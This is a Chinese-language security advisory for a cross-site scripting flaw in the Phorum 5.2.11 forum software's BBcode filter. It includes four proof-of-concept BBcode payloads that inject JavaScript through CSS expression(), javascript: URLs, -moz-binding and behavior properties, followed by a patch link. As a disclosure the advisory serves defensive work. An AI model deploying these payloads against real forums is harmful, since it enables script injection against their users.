影響版本: Phorum 5.2.11

漏洞描述: BUGTRAQ: 35777  

Phorum是一款基于PHP的WEB論壇程序，可在Linux和Unix操作系統(tǒng)下使用，也可在Microsoft Windows操作系統(tǒng)下使用。  Phorum的過(guò)濾引擎沒(méi)有充分地驗(yàn)證某些BBcode參數(shù)，遠(yuǎn)程攻擊者可以在所提交的請(qǐng)求中使用導(dǎo)致注入并執(zhí)行惡意JavaScript代碼。<*參考   crashfr （crashfr@sysdream.com）http://milw0rm.com/exploits/9231  http://secunia.com/advisories/35928/ *>

測(cè)試方法: [www.sebug.net]

本站提供程序(方法)可能帶有攻擊性,僅供安全研究與教學(xué)之用,風(fēng)險(xiǎn)自負(fù)!

[color=#000000;background-image:url(javascript:alert(’Sysdream_IE6_Alert’));]Sysdream Testing IE6[/color]
[color=#000000;xss:expression(alert(’Sysdream_IE7_Alert’));]Sysdream Testing XSS[/color]
[color=#000000;-moz-binding:url( http://127.0.0.1/phorum/file.php?0,file=9,filename=script.xml#mycode);]Sysdream">http://127.0.0.1/phorum/file.php?0,file=9,filename=script.xml#mycode);]Sysdream Testing FF[/color]
[color=#000000;behavior:url( http://127.0.0.1/phorum/file.php?0,file=8,filename=script.htc);]Sysdream">http://127.0.0.1/phorum/file.php?0,file=8,filename=script.htc);]Sysdream Testing FF[/color]SEBUG

安全建議: 廠商補(bǔ)?。?Phorum

目前廠商已經(jīng)發(fā)布了升級(jí)補(bǔ)丁以修復(fù)這個(gè)安全問(wèn)題。

請(qǐng)到廠商的主頁(yè)下載： http://www.phorum.org/phorum5/read.php?64,139411

【編輯推薦】

1. Macromedia ColdFusion日志條目HTML注入漏洞
2. 多家廠商的web漏洞掃描程序存在HTML注入漏洞
3. Rockliffe 郵件信息HTML注入漏洞